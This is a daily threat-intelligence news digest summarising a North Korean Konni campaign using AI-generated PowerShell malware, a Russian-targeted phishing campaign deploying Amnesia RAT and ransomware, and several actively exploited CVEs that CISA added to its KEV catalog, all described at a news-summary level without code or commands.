Cyware Daily Threat Intelligence, January 26, 2026

North Korean hackers are using AI to sharpen their social engineering. The Konni group’s "Operation Poseidon" targets blockchain developers in Japan, Australia, and India with AI-generated PowerShell malware. Disguised as financial notices, the campaign deploys the EndRAT backdoor through malicious shortcuts.

Russian businesses are facing a dual-threat assault that combines espionage with extortion. A new campaign uses deceptive documents to distract users while silently installing Amnesia RAT and ransomware. By hosting payloads on public cloud services to evade detection, the campaign steals sensitive browser and crypto data before locking the system and demanding payment.

CISA has added four high-severity vulnerabilities to its KEV catalog. With attackers also targeting flaws in Vite, Versa, Prettier, and Zimbra, organizations are urged to patch immediately to prevent unauthorized administrative access and file exposure.

Top Malware Reported in the Last 24 Hours

Konni deploys AI-generated PowerShell malware

North Korean hacking group Konni has been observed using AI-generated PowerShell malware to target blockchain developers in Japan, Australia, and India. This phishing campaign, known as Operation Poseidon, exploits social engineering techniques, employing malicious emails disguised as financial notices to trick recipients into downloading harmful ZIP files. These files contain a Windows shortcut that executes an embedded PowerShell loader, leading to the deployment of a backdoor known as EndRAT. The malware is designed to evade detection and establish persistence on infected systems, allowing attackers to gain broader access to development environments.

Multi-stage phishing campaign targets Russia

A multi-stage phishing campaign has been identified targeting users in Russia, utilizing ransomware and Amnesia RAT. The attack begins with social engineering tactics, presenting seemingly benign business documents that distract victims while malicious activities occur in the background. The campaign effectively employs public cloud services for payload distribution, complicating detection and takedown efforts. Malicious scripts are delivered through compressed archives containing deceptive documents and Windows shortcuts, which, when executed, initiate a series of PowerShell commands to download additional payloads. The final stages include deploying Amnesia RAT for extensive data theft and a ransomware variant that encrypts files and manipulates cryptocurrency transactions.

Top Vulnerabilities Reported in the Last 24 Hours

CISA adds VMware vCenter bug to KEV catalog

CISA has added a critical vulnerability, CVE-2024-37079, affecting VMware vCenter Server to its KEV catalog due to evidence of active exploitation. This heap overflow vulnerability in the DCE/RPC protocol allows attackers with network access to execute remote code by sending specially crafted packets. This flaw is part of a set of four vulnerabilities, including another heap overflow and a privilege escalation issue. Although the specific details of the exploitation and the responsible threat actors remain unclear, Broadcom has confirmed that CVE-2024-37079 is being actively exploited in the wild.

CISA confirms exploitation of four software vulnerabilities

CISA has confirmed the active exploitation of four vulnerabilities affecting enterprise software from Versa, Zimbra, Vite, and Prettier. Among these, CVE-2025-31125 is a high-severity improper access control issue in Vite that can expose sensitive files. CVE-2025-34026 is a critical authentication bypass in the Versa Concerto SD-WAN platform, resulting from a misconfigured Traefik reverse proxy, which allows unauthorized access to administrative endpoints. Additionally, CVE-2025-54313 involves a supply-chain compromise in the eslint-config-prettier package, where hackers embedded malicious code in popular JavaScript libraries. Lastly, CVE-2025-68645 is a local file inclusion vulnerability in Zimbra's Webmail Classic UI, enabling attackers to exploit user-supplied parameters to access arbitrary files. CISA has added these vulnerabilities to its KEV catalog, indicating their active exploitation in the wild.